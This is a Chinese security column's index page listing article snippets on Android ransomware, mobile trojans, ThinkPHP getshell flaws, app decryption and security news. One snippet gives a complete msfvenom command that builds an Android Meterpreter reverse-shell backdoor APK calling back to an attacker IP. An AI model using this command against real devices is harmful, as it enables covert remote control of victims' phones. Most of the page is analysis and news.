首页
学习
活动
专区
工具
TVP
发布

黑白安全

黑白网成立于2014年,基于丰富的技术和经验,提供各类技术性动态。官网:heibai.org.cn
专栏成员
1299
文章
2268671
阅读量
251
订阅数
是谁锁了我的“机”
前言锁机一直是个值得长期讨论的话题,许多安卓用户被某些特殊的应用名称或图标所吸引(如某些游戏外挂、xx神器、刷赞等),从而被诱导下载安装,授权后导致手机屏幕被锁,用户无法正常使用手机,并通过这种方式威胁用户支付一定的赎金来解锁。接下来我们通过一个示例,来聊聊锁机软件到底是通过哪些方式进入我们的生活中的。分析1. 取证样本与环境样本:被恶意修改的文件管理APK
C4rpeDime
2022-04-26
9040
警惕有毒的“美女”手机app
现在手机应用十分丰富,各种美女直播app更是五花八门,层出不穷。不过这些app大多是挂羊头卖狗肉,你想想真的有那么多正经小姐姐闲着跟你聊吗?实际上装了这app不知不觉你的信息已经被盗走,更有甚者还付出了金钱的代价。
C4rpeDime
2022-04-26
2.8K0
木马msfpayload
安卓木马后门:msfvenom -p Android/Meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555 R > /root/apk.apk
C4rpeDime
2022-04-26
1.2K0
安卓手机远控
当然,所有的实验均是在模拟器上进行,属于局域网.如果实现外网手机远控,可以在服务器上进行.
C4rpeDime
2022-04-26
2.3K0
手机定位浅析 AGPS定位 LBS基站定位 卫星定位
手机定位是指通过特定的定位技术来获取移动手机或终端用户的位置信息(经纬度坐标),在电子地图上标出被定位对象的位置的技术或服务。定位技术有两种,一种是基于GPS的定位,一种是基于移动运营网的基站的定位。基于GPS的定位方式是利用手机上的GPS定位模块将自己的位置信号发送到定位后台来实现手机定位的。基站定位则是利用基站对手机的距离的测算距离来确定手机位置的。后者不需要手机具有GPS定位能力,但是精度很大程度依赖于基站的分布及覆盖范围的大小,误差会超过一公里。前者定位精度较高。此外还有利用Wifi在小范围内定位方式。
C4rpeDime
2022-04-24
3K0
Android微信逆向--实现发朋友圈动态
最近一直在研究Windows逆向的东西,想着快要把Android给遗忘了。所以就想利用工作之余来研究Android相关的技术,来保持对Android热情。调用微信代码来发送朋友圈动态一直是自己想实现的东西,研究了一下,果然实现了,遂写下本文当作记录。本文主要分析发送纯文字朋友圈动态和发送图片朋友圈动态。
C4rpeDime
2020-06-10
2.9K0
ThinkPHP 6.0.1 漏洞分析(任意文件操作)
2020年1月10日,ThinkPHP团队发布一个补丁更新,修复了一处由不安全的SessionId导致的任意文件操作漏洞.该漏洞允许攻击者在目标环境启用session的条件下创建任意文件以及删除任意文件,在特定情况下还可以getshell.
C4rpeDime
2020-04-08
2.5K0
QQ安全中心 - 动态口令的生成算法
I won't provide English version for this article. Because the app serves for QQ users which are Chinese mainly.
C4rpeDime
2020-02-24
1.9K0
Thinkphp < 6.0.2 session id未作过滤导致getshell
2020年1月13号,Thinkphp 6.0.2发布,在详情页指出修复了一处Session安全隐患。
C4rpeDime
2020-02-14
1.1K0
Thinkphp < 6.0.2 session id未作过滤导致getshell
2020年1月13号,Thinkphp 6.0.2发布,在详情页指出修复了一处Session安全隐患。
C4rpeDime
2020-01-28
8910
Androwarn:一款针对Android端恶意软件的全功能静态代码分析工具
Androwarn是一款专为Android端应用程序设计的安全分析工具,该功能的主要功能是检测并提醒用户Android应用程序中潜在的恶意行为。
C4rpeDime
2020-01-20
1.4K0
手机定位浅析 AGPS定位 LBS基站定位 卫星定位
手机定位是指通过特定的定位技术来获取移动手机或终端用户的位置信息(经纬度坐标),在电子地图上标出被定位对象的位置的技术或服务。定位技术有两种,一种是基于GPS的定位,一种是基于移动运营网的基站的定位。基于GPS的定位方式是利用手机上的GPS定位模块将自己的位置信号发送到定位后台来实现手机定位的。基站定位则是利用基站对手机的距离的测算距离来确定手机位置的。后者不需要手机具有GPS定位能力,但是精度很大程度依赖于基站的分布及覆盖范围的大小,误差会超过一公里。前者定位精度较高。此外还有利用Wifi在小范围内定位方式。
C4rpeDime
2020-01-20
5.8K0
App渗透中常见的加密与解密
前言:本文主要介绍了目前App数据传输过程中几种常见的加密方式,以及一些常规的解密手段,并不涵盖并应对所有情况,在实战过程中还须具体情况具体分析,随机应变;同时,也十分欢迎与希望各路大神提出宝贵建议和思路,一起学习和研究。(注:全文中所提到的App仅针对Android App)
C4rpeDime
2018-10-25
8.4K0
Google+安全漏洞引欧洲关注 德国爱尔兰介入调查
据彭博社报道,搜索巨头谷歌旗下同名社交网络Google+“软件故障”被曝光后,引发欧洲隐私保护机构关注。德国汉堡的数据保护专员约翰内斯·卡斯帕(Johannes Caspar)宣布,该机构已经开始调查此事,这个漏洞可能导致多达50万用户的个人数据被泄露。
C4rpeDime
2018-10-11
2860
少年黑客入侵苹果下载 1TB 数据,被判处缓刑 8 个月
许多企业都青睐苹果设备,其中一部分原因就是苹果公司的iPhone和Mac在安全方面有着出色的表现。 就在上周,福布斯杂志透露民主党全国委员会(民主党全国委员会)正在放弃Android,转而使用iOS设备,因为人们担心在中期选举中出现黑客攻击行为。
C4rpeDime
2018-10-11
4950
苹果并不绝对安全 iPhone 可能泄露企业 WiFi 密码
许多企业都青睐苹果设备,其中一部分原因就是苹果公司的iPhone和Mac在安全方面有着出色的表现。 就在上周,福布斯杂志透露民主党全国委员会(民主党全国委员会)正在放弃Android,转而使用iOS设备,因为人们担心在中期选举中出现黑客攻击行为。
C4rpeDime
2018-10-11
5250
Telegram 被指默认设置状态下会在用户通话过程中曝光 IP 地址
据外媒报道,Telegram 是一款可以让用户在互联网上与其他用户展开加密聊天和通话的通信应用。这款程序自称是一款安全的私人通信应用程序,然而一项研究发现,在它的默认配置下,它会在用户通话过程中泄露出 IP 地址。
C4rpeDime
2018-10-10
2.2K0
Devploit v3.6 - 信息收集工具
(要在Android中运行,请不要安装文件直接运行python2 Devploit) 属性:
C4rpeDime
2018-09-28
6851
美当局确认一名 CIA “Vault 7″泄露事件主犯
据外媒报道,美国官方已经确认Vault 7泄露案中的一名主要嫌疑人。据了解,在Vault 7泄露案中,大量CIA使用的网络攻击遭到曝光,包括针对iPhone和Mac的软件漏洞。《华盛顿邮报》称,来自最新的法庭文件显示,政府当局认为Joshua Adam Schulte为维基解密提供了CIA绝密网络武器和间谍工具技术相关信息。
C4rpeDime
2018-08-29
3020
DNS 劫持恶意软件 Roaming Mantis 升级,针对全球 iOS、Android 和桌面用户
据外媒报道, 卡巴斯基实验室发现针对 Android 设备的路由器 的 DNS 劫持恶意软件 Roaming Mantis 现在已升级到了针对 iOS 设备以及桌面用户。最初该恶意软件被发现在上个月劫持了网络路由器,目的旨在散布窃取用户登录凭证和双重身份验证密码的 Android 银行恶意软件。而目前根据卡巴斯基实验室的安全研究人员的说法,通过增加针对 iOS 设备的钓鱼攻击以及针对 PC 用户的加密货币挖掘脚本,Roaming Mantis 活动背后的犯罪集团已经扩大了他们的目标。此外,尽管最初的袭击旨在针对来自东南亚的用户 ,但目前该新活动已经演变到支持 27 种语言,以扩大在欧洲和中东地区的业务范围。
C4rpeDime
2018-08-29
1.4K0
点击加载更多
社区活动
【纪录片】中国数据库前世今生
穿越半个世纪,探寻中国数据库50年的发展历程
Python精品学习库
代码在线跑,知识轻松学
博客搬家 | 分享价值百万资源包
自行/邀约他人一键搬运博客,速成社区影响力并领取好礼
技术创作特训营·精选知识专栏
往期视频·千货材料·成员作品 最新动态
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档